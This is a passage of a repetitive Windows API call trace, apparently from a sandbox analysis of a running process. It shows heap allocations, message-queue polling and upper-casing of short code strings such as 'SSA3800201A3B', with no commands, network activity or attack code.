0x34aa6a0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0165.638] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.639] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.639] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.639] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.639] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.639] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0165.639] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.639] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.640] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.640] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.640] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0165.640] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.640] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.640] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.640] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.641] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.641] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.641] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.641] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.641] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.641] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0165.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.644] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0165.644] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.644] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0165.644] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.644] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.644] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.644] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.645] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.645] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.645] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.645] CryptDestroyKey (hKey=0xaa5660) returned 1 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416a80 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0165.646] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.646] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.646] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.646] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.646] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.646] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.646] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.647] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0165.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.647] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0165.647] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.648] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.648] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.648] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.648] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.648] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.648] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.648] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0165.648] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.649] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.649] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0165.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.650] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0165.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, 